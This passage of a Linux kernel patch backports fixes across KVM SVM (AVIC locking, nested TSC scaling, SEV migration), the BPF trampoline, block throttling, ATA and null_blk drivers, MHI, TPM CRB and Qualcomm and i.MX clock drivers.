++	 */
+ 	entry = READ_ONCE(*(svm->avic_physical_id_cache));
+ 
+ 	/* Nothing to do if IsRunning == '0' due to vCPU blocking. */
+ 	if (!(entry & AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK))
+ 		return;
+ 
++	/*
++	 * Take and hold the per-vCPU interrupt remapping lock while updating
++	 * the Physical ID entry even though the lock doesn't protect against
++	 * multiple writers (see above).  Holding ir_list_lock ensures that
++	 * either svm_ir_list_add() will consume up-to-date entry information,
++	 * or that this task will wait until svm_ir_list_add() completes to
++	 * mark the vCPU as not running.
++	 */
++	spin_lock_irqsave(&svm->ir_list_lock, flags);
++
+ 	avic_update_iommu_vcpu_affinity(vcpu, -1, 0);
+ 
+ 	entry &= ~AVIC_PHYSICAL_ID_ENTRY_IS_RUNNING_MASK;
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
++
++	spin_unlock_irqrestore(&svm->ir_list_lock, flags);
++
+ }
+ 
+ void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+diff --git a/arch/x86/kvm/svm/nested.c b/arch/x86/kvm/svm/nested.c
+index 92268645a5fed..8053974af326c 100644
+--- a/arch/x86/kvm/svm/nested.c
++++ b/arch/x86/kvm/svm/nested.c
+@@ -660,10 +660,9 @@ static void nested_vmcb02_prepare_control(struct vcpu_svm *svm,
+ 
+ 	vmcb02->control.tsc_offset = vcpu->arch.tsc_offset;
+ 
+-	if (svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio) {
+-		WARN_ON(!svm->tsc_scaling_enabled);
++	if (svm->tsc_scaling_enabled &&
++	    svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio)
+ 		nested_svm_update_tsc_ratio_msr(vcpu);
+-	}
+ 
+ 	vmcb02->control.int_ctl             =
+ 		(svm->nested.ctl.int_ctl & int_ctl_vmcb12_bits) |
+@@ -1022,8 +1021,8 @@ int nested_svm_vmexit(struct vcpu_svm *svm)
+ 		vmcb_mark_dirty(vmcb01, VMCB_INTERCEPTS);
+ 	}
+ 
+-	if (svm->tsc_ratio_msr != kvm_caps.default_tsc_scaling_ratio) {
+-		WARN_ON(!svm->tsc_scaling_enabled);
++	if (kvm_caps.has_tsc_control &&
++	    vcpu->arch.tsc_scaling_ratio != vcpu->arch.l1_tsc_scaling_ratio) {
+ 		vcpu->arch.tsc_scaling_ratio = vcpu->arch.l1_tsc_scaling_ratio;
+ 		__svm_write_tsc_multiplier(vcpu->arch.tsc_scaling_ratio);
+ 	}
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index e0437acb5cf75..d08d5e085649f 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1723,7 +1723,7 @@ static void sev_migrate_from(struct kvm *dst_kvm, struct kvm *src_kvm)
+ 		 * Note, the source is not required to have the same number of
+ 		 * vCPUs as the destination when migrating a vanilla SEV VM.
+ 		 */
+-		src_vcpu = kvm_get_vcpu(dst_kvm, i);
++		src_vcpu = kvm_get_vcpu(src_kvm, i);
+ 		src_svm = to_svm(src_vcpu);
+ 
+ 		/*
+@@ -2951,9 +2951,12 @@ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ 	/*
+ 	 * An SEV-ES guest requires a VMSA area that is a separate from the
+ 	 * VMCB page. Do not include the encryption mask on the VMSA physical
+-	 * address since hardware will access it using the guest key.
++	 * address since hardware will access it using the guest key.  Note,
++	 * the VMSA will be NULL if this vCPU is the destination for intrahost
++	 * migration, and will be copied later.
+ 	 */
+-	svm->vmcb->control.vmsa_pa = __pa(svm->sev_es.vmsa);
++	if (svm->sev_es.vmsa)
++		svm->vmcb->control.vmsa_pa = __pa(svm->sev_es.vmsa);
+ 
+ 	/* Can't intercept CR register access, HV can't modify CR registers */
+ 	svm_clr_intercept(svm, INTERCEPT_CR0_READ);
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index a96f9a17e8b5d..7e4d66be18ef5 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -366,6 +366,8 @@ static void svm_set_interrupt_shadow(struct kvm_vcpu *vcpu, int mask)
+ 		svm->vmcb->control.int_state |= SVM_INTERRUPT_SHADOW_MASK;
+ 
+ }
++static bool svm_can_emulate_instruction(struct kvm_vcpu *vcpu, int emul_type,
++					void *insn, int insn_len);
+ 
+ static int __svm_skip_emulated_instruction(struct kvm_vcpu *vcpu,
+ 					   bool commit_side_effects)
+@@ -386,6 +388,14 @@ static int __svm_skip_emulated_instruction(struct kvm_vcpu *vcpu,
+ 	}
+ 
+ 	if (!svm->next_rip) {
++		/*
++		 * FIXME: Drop this when kvm_emulate_instruction() does the
++		 * right thing and treats "can't emulate" as outright failure
++		 * for EMULTYPE_SKIP.
++		 */
++		if (!svm_can_emulate_instruction(vcpu, EMULTYPE_SKIP, NULL, 0))
++			return 0;
++
+ 		if (unlikely(!commit_side_effects))
+ 			old_rflags = svm->vmcb->save.rflags;
+ 
+@@ -4592,16 +4602,25 @@ static bool svm_can_emulate_instruction(struct kvm_vcpu *vcpu, int emul_type,
+ 	 * and cannot be decrypted by KVM, i.e. KVM would read cyphertext and
+ 	 * decode garbage.
+ 	 *
+-	 * Inject #UD if KVM reached this point without an instruction buffer.
+-	 * In practice, this path should never be hit by a well-behaved guest,
+-	 * e.g. KVM doesn't intercept #UD or #GP for SEV guests, but this path
+-	 * is still theoretically reachable, e.g. via unaccelerated fault-like
+-	 * AVIC access, and needs to be handled by KVM to avoid putting the
+-	 * guest into an infinite loop.   Injecting #UD is somewhat arbitrary,
+-	 * but its the least awful option given lack of insight into the guest.
++	 * If KVM is NOT trying to simply skip an instruction, inject #UD if
++	 * KVM reached this point without an instruction buffer.  In practice,
++	 * this path should never be hit by a well-behaved guest, e.g. KVM
++	 * doesn't intercept #UD or #GP for SEV guests, but this path is still
++	 * theoretically reachable, e.g. via unaccelerated fault-like AVIC
++	 * access, and needs to be handled by KVM to avoid putting the guest
++	 * into an infinite loop.   Injecting #UD is somewhat arbitrary, but
++	 * its the least awful option given lack of insight into the guest.
++	 *
++	 * If KVM is trying to skip an instruction, simply resume the guest.
++	 * If a #NPF occurs while the guest is vectoring an INT3/INTO, then KVM
++	 * will attempt to re-inject the INT3/INTO and skip the instruction.
++	 * In that scenario, retrying the INT3/INTO and hoping the guest will
++	 * make forward progress is the only option that has a chance of
++	 * success (and in practice it will work the vast majority of the time).
+ 	 */
+ 	if (unlikely(!insn)) {
+-		kvm_queue_exception(vcpu, UD_VECTOR);
++		if (!(emul_type & EMULTYPE_SKIP))
++			kvm_queue_exception(vcpu, UD_VECTOR);
+ 		return false;
+ 	}
+ 
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index db6053a22e866..5e680e039d0e1 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -1813,10 +1813,6 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 			   struct bpf_tramp_link *l, int stack_size,
+ 			   int run_ctx_off, bool save_ret)
+ {
+-	void (*exit)(struct bpf_prog *prog, u64 start,
+-		     struct bpf_tramp_run_ctx *run_ctx) = __bpf_prog_exit;
+-	u64 (*enter)(struct bpf_prog *prog,
+-		     struct bpf_tramp_run_ctx *run_ctx) = __bpf_prog_enter;
+ 	u8 *prog = *pprog;
+ 	u8 *jmp_insn;
+ 	int ctx_cookie_off = offsetof(struct bpf_tramp_run_ctx, bpf_cookie);
+@@ -1835,23 +1831,12 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 	 */
+ 	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_1, -run_ctx_off + ctx_cookie_off);
+ 
+-	if (p->aux->sleepable) {
+-		enter = __bpf_prog_enter_sleepable;
+-		exit = __bpf_prog_exit_sleepable;
+-	} else if (p->type == BPF_PROG_TYPE_STRUCT_OPS) {
+-		enter = __bpf_prog_enter_struct_ops;
+-		exit = __bpf_prog_exit_struct_ops;
+-	} else if (p->expected_attach_type == BPF_LSM_CGROUP) {
+-		enter = __bpf_prog_enter_lsm_cgroup;
+-		exit = __bpf_prog_exit_lsm_cgroup;
+-	}
+-
+ 	/* arg1: mov rdi, progs[i] */
+ 	emit_mov_imm64(&prog, BPF_REG_1, (long) p >> 32, (u32) (long) p);
+ 	/* arg2: lea rsi, [rbp - ctx_cookie_off] */
+ 	EMIT4(0x48, 0x8D, 0x75, -run_ctx_off);
+ 
+-	if (emit_call(&prog, enter, prog))
++	if (emit_call(&prog, bpf_trampoline_enter(p), prog))
+ 		return -EINVAL;
+ 	/* remember prog start time returned by __bpf_prog_enter */
+ 	emit_mov_reg(&prog, true, BPF_REG_6, BPF_REG_0);
+@@ -1896,7 +1881,7 @@ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+ 	emit_mov_reg(&prog, true, BPF_REG_2, BPF_REG_6);
+ 	/* arg3: lea rdx, [rbp - run_ctx_off] */
+ 	EMIT4(0x48, 0x8D, 0x55, -run_ctx_off);
+-	if (emit_call(&prog, exit, prog))
++	if (emit_call(&prog, bpf_trampoline_exit(p), prog))
+ 		return -EINVAL;
+ 
+ 	*pprog = prog;
+diff --git a/block/blk-throttle.c b/block/blk-throttle.c
+index f1bc600c4ded6..1007f80278579 100644
+--- a/block/blk-throttle.c
++++ b/block/blk-throttle.c
+@@ -697,11 +697,41 @@ static bool throtl_slice_used(struct throtl_grp *tg, bool rw)
+ 	return true;
+ }
+ 
++static unsigned int calculate_io_allowed(u32 iops_limit,
++					 unsigned long jiffy_elapsed)
++{
++	unsigned int io_allowed;
++	u64 tmp;
++
++	/*
++	 * jiffy_elapsed should not be a big value as minimum iops can be
++	 * 1 then at max jiffy elapsed should be equivalent of 1 second as we
++	 * will allow dispatch after 1 second and after that slice should
++	 * have been trimmed.
++	 */
++
++	tmp = (u64)iops_limit * jiffy_elapsed;
++	do_div(tmp, HZ);
++
++	if (tmp > UINT_MAX)
++		io_allowed = UINT_MAX;
++	else
++		io_allowed = tmp;
++
++	return io_allowed;
++}
++
++static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
++{
++	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
++}
++
+ /* Trim the used slices and adjust slice start accordingly */
+ static inline void throtl_trim_slice(struct throtl_grp *tg, bool rw)
+ {
+-	unsigned long nr_slices, time_elapsed, io_trim;
+-	u64 bytes_trim, tmp;
++	unsigned long time_elapsed;
++	long long bytes_trim;
++	int io_trim;
+ 
+ 	BUG_ON(time_before(tg->slice_end[rw], tg->slice_start[rw]));
+ 
+@@ -723,67 +753,38 @@ static inline void throtl_trim_slice(struct throtl_grp *tg, bool rw)
+ 
+ 	throtl_set_slice_end(tg, rw, jiffies + tg->td->throtl_slice);
+ 
+-	time_elapsed = jiffies - tg->slice_start[rw];
+-
+-	nr_slices = time_elapsed / tg->td->throtl_slice;
+-
+-	if (!nr_slices)
++	time_elapsed = rounddown(jiffies - tg->slice_start[rw],
++				 tg->td->throtl_slice);
++	if (!time_elapsed)
+ 		return;
+-	tmp = tg_bps_limit(tg, rw) * tg->td->throtl_slice * nr_slices;
+-	do_div(tmp, HZ);
+-	bytes_trim = tmp;
+ 
+-	io_trim = (tg_iops_limit(tg, rw) * tg->td->throtl_slice * nr_slices) /
+-		HZ;
+-
+-	if (!bytes_trim && !io_trim)
++	bytes_trim = calculate_bytes_allowed(tg_bps_limit(tg, rw),
++					     time_elapsed) +
++		     tg->carryover_bytes[rw];
++	io_trim = calculate_io_allowed(tg_iops_limit(tg, rw), time_elapsed) +
++		  tg->carryover_ios[rw];
++	if (bytes_trim <= 0 && io_trim <= 0)
+ 		return;
+ 
+-	if (tg->bytes_disp[rw] >= bytes_trim)
++	tg->carryover_bytes[rw] = 0;
++	if ((long long)tg->bytes_disp[rw] >= bytes_trim)
+ 		tg->bytes_disp[rw] -= bytes_trim;
+ 	else
+ 		tg->bytes_disp[rw] = 0;
+ 
+-	if (tg->io_disp[rw] >= io_trim)
++	tg->carryover_ios[rw] = 0;
++	if ((int)tg->io_disp[rw] >= io_trim)
+ 		tg->io_disp[rw] -= io_trim;
+ 	else
+ 		tg->io_disp[rw] = 0;
+ 
+-	tg->slice_start[rw] += nr_slices * tg->td->throtl_slice;
++	tg->slice_start[rw] += time_elapsed;
+ 
+ 	throtl_log(&tg->service_queue,
+-		   "[%c] trim slice nr=%lu bytes=%llu io=%lu start=%lu end=%lu jiffies=%lu",
+-		   rw == READ ? 'R' : 'W', nr_slices, bytes_trim, io_trim,
+-		   tg->slice_start[rw], tg->slice_end[rw], jiffies);
+-}
+-
+-static unsigned int calculate_io_allowed(u32 iops_limit,
+-					 unsigned long jiffy_elapsed)
+-{
+-	unsigned int io_allowed;
+-	u64 tmp;
+-
+-	/*
+-	 * jiffy_elapsed should not be a big value as minimum iops can be
+-	 * 1 then at max jiffy elapsed should be equivalent of 1 second as we
+-	 * will allow dispatch after 1 second and after that slice should
+-	 * have been trimmed.
+-	 */
+-
+-	tmp = (u64)iops_limit * jiffy_elapsed;
+-	do_div(tmp, HZ);
+-
+-	if (tmp > UINT_MAX)
+-		io_allowed = UINT_MAX;
+-	else
+-		io_allowed = tmp;
+-
+-	return io_allowed;
+-}
+-
+-static u64 calculate_bytes_allowed(u64 bps_limit, unsigned long jiffy_elapsed)
+-{
+-	return mul_u64_u64_div_u64(bps_limit, (u64)jiffy_elapsed, (u64)HZ);
++		   "[%c] trim slice nr=%lu bytes=%lld io=%d start=%lu end=%lu jiffies=%lu",
++		   rw == READ ? 'R' : 'W', time_elapsed / tg->td->throtl_slice,
++		   bytes_trim, io_trim, tg->slice_start[rw], tg->slice_end[rw],
++		   jiffies);
+ }
+ 
+ static void __tg_update_carryover(struct throtl_grp *tg, bool rw)
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 53ab2306da009..1645335b8d2df 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -422,6 +422,8 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
++	/* Elkhart Lake IDs 0x4b60 & 0x4b62 https://sata-io.org/product/8803 not tested yet */
++	{ PCI_VDEVICE(INTEL, 0x4b63), board_ahci_low_power }, /* Elkhart Lake AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/ata/pata_falcon.c b/drivers/ata/pata_falcon.c
+index 823c88622e34a..ffdd12e722c99 100644
+--- a/drivers/ata/pata_falcon.c
++++ b/drivers/ata/pata_falcon.c
+@@ -123,8 +123,8 @@ static int __init pata_falcon_init_one(struct platform_device *pdev)
+ 	struct resource *base_res, *ctl_res, *irq_res;
+ 	struct ata_host *host;
+ 	struct ata_port *ap;
+-	void __iomem *base;
+-	int irq = 0;
++	void __iomem *base, *ctl_base;
++	int irq = 0, io_offset = 1, reg_shift = 2; /* Falcon defaults */
+ 
+ 	dev_info(&pdev->dev, "Atari Falcon and Q40/Q60 PATA controller\n");
+ 
+@@ -165,26 +165,34 @@ static int __init pata_falcon_init_one(struct platform_device *pdev)
+ 	ap->pio_mask = ATA_PIO4;
+ 	ap->flags |= ATA_FLAG_SLAVE_POSS | ATA_FLAG_NO_IORDY;
+ 
+-	base = (void __iomem *)base_mem_res->start;
+ 	/* N.B. this assumes data_addr will be used for word-sized I/O only */
+-	ap->ioaddr.data_addr		= base + 0 + 0 * 4;
+-	ap->ioaddr.error_addr		= base + 1 + 1 * 4;
+-	ap->ioaddr.feature_addr		= base + 1 + 1 * 4;
+-	ap->ioaddr.nsect_addr		= base + 1 + 2 * 4;
+-	ap->ioaddr.lbal_addr		= base + 1 + 3 * 4;
+-	ap->ioaddr.lbam_addr		= base + 1 + 4 * 4;
+-	ap->ioaddr.lbah_addr		= base + 1 + 5 * 4;
+-	ap->ioaddr.device_addr		= base + 1 + 6 * 4;
+-	ap->ioaddr.status_addr		= base + 1 + 7 * 4;
+-	ap->ioaddr.command_addr		= base + 1 + 7 * 4;
+-
+-	base = (void __iomem *)ctl_mem_res->start;
+-	ap->ioaddr.altstatus_addr	= base + 1;
+-	ap->ioaddr.ctl_addr		= base + 1;
+-
+-	ata_port_desc(ap, "cmd 0x%lx ctl 0x%lx",
+-		      (unsigned long)base_mem_res->start,
+-		      (unsigned long)ctl_mem_res->start);
++	ap->ioaddr.data_addr = (void __iomem *)base_mem_res->start;
++
++	if (base_res) {		/* only Q40 has IO resources */
++		io_offset = 0x10000;
++		reg_shift = 0;
++		base = (void __iomem *)base_res->start;
++		ctl_base = (void __iomem *)ctl_res->start;
++	} else {
++		base = (void __iomem *)base_mem_res->start;
++		ctl_base = (void __iomem *)ctl_mem_res->start;
++	}
++
++	ap->ioaddr.error_addr	= base + io_offset + (1 << reg_shift);
++	ap->ioaddr.feature_addr	= base + io_offset + (1 << reg_shift);
++	ap->ioaddr.nsect_addr	= base + io_offset + (2 << reg_shift);
++	ap->ioaddr.lbal_addr	= base + io_offset + (3 << reg_shift);
++	ap->ioaddr.lbam_addr	= base + io_offset + (4 << reg_shift);
++	ap->ioaddr.lbah_addr	= base + io_offset + (5 << reg_shift);
++	ap->ioaddr.device_addr	= base + io_offset + (6 << reg_shift);
++	ap->ioaddr.status_addr	= base + io_offset + (7 << reg_shift);
++	ap->ioaddr.command_addr	= base + io_offset + (7 << reg_shift);
++
++	ap->ioaddr.altstatus_addr	= ctl_base + io_offset;
++	ap->ioaddr.ctl_addr		= ctl_base + io_offset;
++
++	ata_port_desc(ap, "cmd %px ctl %px data %px",
++		      base, ctl_base, ap->ioaddr.data_addr);
+ 
+ 	irq_res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
+ 	if (irq_res && irq_res->start > 0) {
+diff --git a/drivers/ata/pata_ftide010.c b/drivers/ata/pata_ftide010.c
+index 0117df0fe3c59..092ba6f87aa31 100644
+--- a/drivers/ata/pata_ftide010.c
++++ b/drivers/ata/pata_ftide010.c
+@@ -567,6 +567,7 @@ static struct platform_driver pata_ftide010_driver = {
+ };
+ module_platform_driver(pata_ftide010_driver);
+ 
++MODULE_DESCRIPTION("low level driver for Faraday Technology FTIDE010");
+ MODULE_AUTHOR("Linus Walleij <linus.walleij@linaro.org>");
+ MODULE_LICENSE("GPL");
+ MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/ata/sata_gemini.c b/drivers/ata/sata_gemini.c
+index b729e9919bb0c..c96fcf9ee3c07 100644
+--- a/drivers/ata/sata_gemini.c
++++ b/drivers/ata/sata_gemini.c
+@@ -428,6 +428,7 @@ static struct platform_driver gemini_sata_driver = {
+ };
+ module_platform_driver(gemini_sata_driver);
+ 
++MODULE_DESCRIPTION("low level driver for Cortina Systems Gemini SATA bridge");
+ MODULE_AUTHOR("Linus Walleij <linus.walleij@linaro.org>");
+ MODULE_LICENSE("GPL");
+ MODULE_ALIAS("platform:" DRV_NAME);
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index e8cb914223cdf..e9f38eba2f133 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1585,9 +1585,12 @@ static int null_poll(struct blk_mq_hw_ctx *hctx, struct io_comp_batch *iob)
+ 	struct nullb_queue *nq = hctx->driver_data;
+ 	LIST_HEAD(list);
+ 	int nr = 0;
++	struct request *rq;
+ 
+ 	spin_lock(&nq->poll_lock);
+ 	list_splice_init(&nq->poll_list, &list);
++	list_for_each_entry(rq, &list, queuelist)
++		blk_mq_set_request_complete(rq);
+ 	spin_unlock(&nq->poll_lock);
+ 
+ 	while (!list_empty(&list)) {
+@@ -1613,16 +1616,21 @@ static enum blk_eh_timer_return null_timeout_rq(struct request *rq)
+ 	struct blk_mq_hw_ctx *hctx = rq->mq_hctx;
+ 	struct nullb_cmd *cmd = blk_mq_rq_to_pdu(rq);
+ 
+-	pr_info("rq %p timed out\n", rq);
+-
+ 	if (hctx->type == HCTX_TYPE_POLL) {
+ 		struct nullb_queue *nq = hctx->driver_data;
+ 
+ 		spin_lock(&nq->poll_lock);
++		/* The request may have completed meanwhile. */
++		if (blk_mq_request_completed(rq)) {
++			spin_unlock(&nq->poll_lock);
++			return BLK_EH_DONE;
++		}
+ 		list_del_init(&rq->queuelist);
+ 		spin_unlock(&nq->poll_lock);
+ 	}
+ 
++	pr_info("rq %p timed out\n", rq);
++
+ 	/*
+ 	 * If the device is marked as blocking (i.e. memory backed or zoned
+ 	 * device), the submission path may be blocked waiting for resources
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 083459028a4b8..8a4362d75fc43 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -470,6 +470,10 @@ static void mhi_pm_disable_transition(struct mhi_controller *mhi_cntrl)
+ 
+ 	/* Trigger MHI RESET so that the device will not access host memory */
+ 	if (!MHI_PM_IN_FATAL_STATE(mhi_cntrl->pm_state)) {
++		/* Skip MHI RESET if in RDDM state */
++		if (mhi_cntrl->rddm_image && mhi_get_exec_env(mhi_cntrl) == MHI_EE_RDDM)
++			goto skip_mhi_reset;
++
+ 		dev_dbg(dev, "Triggering MHI Reset in device\n");
+ 		mhi_set_mhi_state(mhi_cntrl, MHI_STATE_RESET);
+ 
+@@ -495,6 +499,7 @@ static void mhi_pm_disable_transition(struct mhi_controller *mhi_cntrl)
+ 		}
+ 	}
+ 
++skip_mhi_reset:
+ 	dev_dbg(dev,
+ 		 "Waiting for all pending event ring processing to complete\n");
+ 	mhi_event = mhi_cntrl->mhi_event;
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index db0b774207d35..f45239e73c4ca 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -775,12 +775,13 @@ static int crb_acpi_add(struct acpi_device *device)
+ 				FW_BUG "TPM2 ACPI table has wrong size %u for start method type %d\n",
+ 				buf->header.length,
+ 				ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON);
+-			return -EINVAL;
++			rc = -EINVAL;
++			goto out;
+ 		}
+ 		crb_pluton = ACPI_ADD_PTR(struct tpm2_crb_pluton, buf, sizeof(*buf));
+ 		rc = crb_map_pluton(dev, priv, buf, crb_pluton);
+ 		if (rc)
+-			return rc;
++			goto out;
+ 	}
+ 
+ 	priv->sm = sm;
+diff --git a/drivers/clk/imx/clk-pll14xx.c b/drivers/clk/imx/clk-pll14xx.c
+index 1d0f79e9c3467..416d582a9e8e0 100644
+--- a/drivers/clk/imx/clk-pll14xx.c
++++ b/drivers/clk/imx/clk-pll14xx.c
+@@ -62,8 +62,6 @@ static const struct imx_pll14xx_rate_table imx_pll1443x_tbl[] = {
+ 	PLL_1443X_RATE(650000000U, 325, 3, 2, 0),
+ 	PLL_1443X_RATE(594000000U, 198, 2, 2, 0),
+ 	PLL_1443X_RATE(519750000U, 173, 2, 2, 16384),
+-	PLL_1443X_RATE(393216000U, 262, 2, 3, 9437),
+-	PLL_1443X_RATE(361267200U, 361, 3, 3, 17511),
+ };
+ 
+ struct imx_pll14xx_clk imx_1443x_pll = {
+@@ -137,11 +135,10 @@ static void imx_pll14xx_calc_settings(struct clk_pll14xx *pll, unsigned long rat
+ 	/*
+ 	 * Fractional PLL constrains:
+ 	 *
+-	 * a) 6MHz <= prate <= 25MHz
+-	 * b) 1 <= p <= 63 (1 <= p <= 4 prate = 24MHz)
+-	 * c) 64 <= m <= 1023
+-	 * d) 0 <= s <= 6
+-	 * e) -32768 <= k <= 32767
++	 * a) 1 <= p <= 63
++	 * b) 64 <= m <= 1023
++	 * c) 0 <= s <= 6
++	 * d) -32768 <= k <= 32767
+ 	 *
+ 	 * fvco = (m * 65536 + k) * prate / (p * 65536)
+ 	 */
+@@ -184,7 +181,7 @@ static void imx_pll14xx_calc_settings(struct clk_pll14xx *pll, unsigned long rat
+ 	}
+ 
+ 	/* Finally calculate best values */
+-	for (pdiv = 1; pdiv <= 7; pdiv++) {
++	for (pdiv = 1; pdiv <= 63; pdiv++) {
+ 		for (sdiv = 0; sdiv <= 6; sdiv++) {
+ 			/* calc mdiv = round(rate * pdiv * 2^sdiv) / prate) */
+ 			mdiv = DIV_ROUND_CLOSEST(rate * (pdiv << sdiv), prate);
+diff --git a/drivers/clk/qcom/camcc-sc7180.c b/drivers/clk/qcom/camcc-sc7180.c
+index 8a4ba7a19ed12..6f56bdbf02047 100644
+--- a/drivers/clk/qcom/camcc-sc7180.c
++++ b/drivers/clk/qcom/camcc-sc7180.c
+@@ -1664,7 +1664,7 @@ static int cam_cc_sc7180_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = pm_runtime_get(&pdev->dev);
++	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/clk/qcom/dispcc-sm8450.c b/drivers/clk/qcom/dispcc-sm8450.c
+index 0cd7ebe90301c..64626f620a01b 100644
+--- a/drivers/clk/qcom/dispcc-sm8450.c
++++ b/drivers/clk/qcom/dispcc-sm8450.c
+@@ -1783,8 +1783,10 @@ static int disp_cc_sm8450_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	regmap = qcom_cc_map(pdev, &disp_cc_sm8450_desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto err_put_rpm;
++	}
+ 
+ 	clk_lucid_evo_pll_configure(&disp_cc_pll0, regmap, &disp_cc_pll0_config);
+ 	clk_lucid_evo_pll_configure(&disp_cc_pll1, regmap, &disp_cc_pll1_config);
+@@ -1799,9 +1801,16 @@ static int disp_cc_sm8450_probe(struct platform_device *pdev)
+ 	regmap_update_bits(regmap, 0xe05c, BIT(0), BIT(0));
+ 
+ 	ret = qcom_cc_really_probe(pdev, &disp_cc_sm8450_desc, regmap);
++	if (ret)
++		goto err_put_rpm;
+ 
+ 	pm_runtime_put(&pdev->dev);
+ 
++	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/clk/qcom/gcc-mdm9615.c b/drivers/clk/qcom/gcc-mdm9615.c
+index 8bed02a748aba..470a277603a92 100644
+--- a/drivers/clk/qcom/gcc-mdm9615.c
++++ b/drivers/clk/qcom/gcc-mdm9615.c
+@@ -58,7 +58,7 @@ static struct clk_regmap pll0_vote = {
+ 	.enable_mask = BIT(0),
+ 	.hw.init = &(struct clk_init_data){
+ 		.name = "pll0_vote",
+-		.parent_names = (const char *[]){ "pll8" },
++		.parent_names = (const char *[]){ "pll0" },
+ 		.num_parents = 1,
+ 		.ops = &clk_pll_vote_ops,
+ 	},
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 8486d7135ab10..113146835902b 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -115,9 +115,13 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 	ret = pm_clk_add(&pdev->dev, "iface");
+ 	if (ret < 0) {
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+-		goto destroy_pm_clk;
++		goto err_destroy_pm_clk;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		goto err_destroy_pm_clk;
++
+ 	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
+ 		lpass_regmap_config.name = "qdsp6ss";
+ 		lpass_regmap_config.max_register = 0x3f;
+@@ -125,7 +129,7 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 		ret = qcom_cc_probe_by_index(pdev, 0, desc);
+ 		if (ret)
+-			goto destroy_pm_clk;
++			goto err_put_rpm;
+ 	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
+@@ -134,11 +138,15 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		goto destroy_pm_clk;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
+ 
+-destroy_pm_clk:
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++err_destroy_pm_clk:
+ 	pm_clk_destroy(&pdev->dev);
+ 
+ disable_pm_runtime:
+diff --git a/drivers/clk/qcom/mss-sc7180.c b/drivers/clk/qcom/mss-sc7180.c
+index 5a14074406623..d106bc65470e1 100644
+--- a/drivers/clk/qcom/mss-sc7180.c
++++ b/drivers/clk/qcom/mss-sc7180.c
+@@ -87,11 +87,22 @@ static int mss_sc7180_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	ret = qcom_cc_probe(pdev, &mss_sc7180_desc);
+ 	if (ret < 0)
+-		return ret;
